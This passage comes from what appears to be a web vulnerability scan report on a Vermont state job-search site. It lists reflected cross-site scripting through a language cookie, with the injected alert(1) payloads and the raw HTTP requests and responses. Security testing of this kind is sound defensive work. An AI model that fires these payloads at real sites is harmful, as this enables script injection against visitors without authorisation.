GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en75aaa"%3balert(1)//0a76fef37a8; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN75AAA";ALERT(1)//0A76FEF37A8\">
...[SNIP]...

3.189. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/404/404_qry.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17dbd"><img%20src%3da%20onerror%3dalert(1)>abbcf0f134a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 17dbd"><img src=a onerror=alert(1)>abbcf0f134a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en17dbd"><img%20src%3da%20onerror%3dalert(1)>abbcf0f134a; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:56 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en17dbd"><img src=a onerror=alert(1)>abbcf0f134a">
...[SNIP]...

3.190. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d0cc"%3balert(1)//58328ab40e9 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 3d0cc";alert(1)//58328ab40e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en3d0cc"%3balert(1)//58328ab40e9; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN3D0CC";ALERT(1)//58328AB40E9\">
...[SNIP]...

3.191. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6398b"><img src=a onerror=alert(1)>ba3c68b365f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en6398b"><img src=a onerror=alert(1)>ba3c68b365f">
...[SNIP]...

3.192. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as acbaa"><img src=a onerror=alert(1)>ae5b7c5d919 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enacbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:31 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enacbaa"><img src=a onerror=alert(1)>ae5b7c5d919">
...[SNIP]...

3.193. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d941"%3balert(1)//bf7542d8709 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 4d941";alert(1)//bf7542d8709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en4d941"%3balert(1)//bf7542d8709; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:39 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-050